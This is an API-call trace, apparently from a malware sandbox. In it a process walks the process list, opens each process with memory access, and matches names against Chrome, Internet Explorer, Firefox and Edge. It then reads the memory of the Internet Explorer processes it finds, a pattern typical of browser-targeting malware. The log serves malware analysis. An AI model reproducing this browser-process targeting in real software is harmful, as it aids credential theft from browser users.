	[0224.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.065] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0224.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0224.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0224.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x590c
	[0224.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.067] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0224.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.068] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.068] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0224.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.069] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.069] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0224.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5910
	[0224.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.070] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0224.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.071] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.071] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0224.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.071] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0224.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5914
	[0224.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.072] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0224.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.073] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.073] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0224.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.073] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.073] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0224.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5918
	[0224.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.074] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0224.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.075] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.075] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0224.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.075] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.075] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0224.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x591c
	[0224.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.076] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0224.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.077] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.077] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0224.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.078] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0224.080] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5920
	[0224.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.080] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0224.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.080] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.081] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0224.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.081] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0224.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5924
	[0224.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.082] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0224.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.083] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.083] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0224.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.083] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.084] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0224.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5928
	[0224.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.085] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0224.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.085] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.086] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0224.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.086] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.086] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0224.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x592c
	[0224.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.087] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0224.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.088] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.088] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0224.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.088] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.088] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0224.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5930
	[0224.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.090] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0224.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.090] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.090] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0224.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.091] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0224.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5934
	[0224.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.092] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0224.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.092] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.093] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0224.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.093] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0224.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5938
	[0224.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.095] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0224.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.096] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.097] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0224.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.097] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0224.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x593c
	[0224.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.098] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0224.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.099] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.099] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0224.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.100] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0224.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5940
	[0224.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.101] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0224.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.102] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.102] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0224.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.103] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.104] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0224.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5944
	[0224.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.104] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0224.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.105] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.105] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0224.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.106] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.106] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5948
	[0224.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.107] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.107] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.108] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.108] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.108] NtQueryInformationProcess (in: ProcessHandle=0x5948, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.108] ReadProcessMemory (in: hProcess=0x5948, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.108] ReadProcessMemory (in: hProcess=0x5948, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.109] ReadProcessMemory (in: hProcess=0x5948, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.109] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x594c
	[0224.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.110] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.111] NtQueryInformationProcess (in: ProcessHandle=0x594c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.111] ReadProcessMemory (in: hProcess=0x594c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.111] ReadProcessMemory (in: hProcess=0x594c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.112] ReadProcessMemory (in: hProcess=0x594c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.112] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5950
	[0224.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.113] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.113] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.113] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.114] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0224.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5954
	[0224.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.115] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0224.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.115] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.116] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0224.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.116] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5958
	[0224.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.118] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.118] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.119] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x595c
	[0224.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.121] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.121] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.121] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.121] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5960
	[0224.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.122] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.123] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.123] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
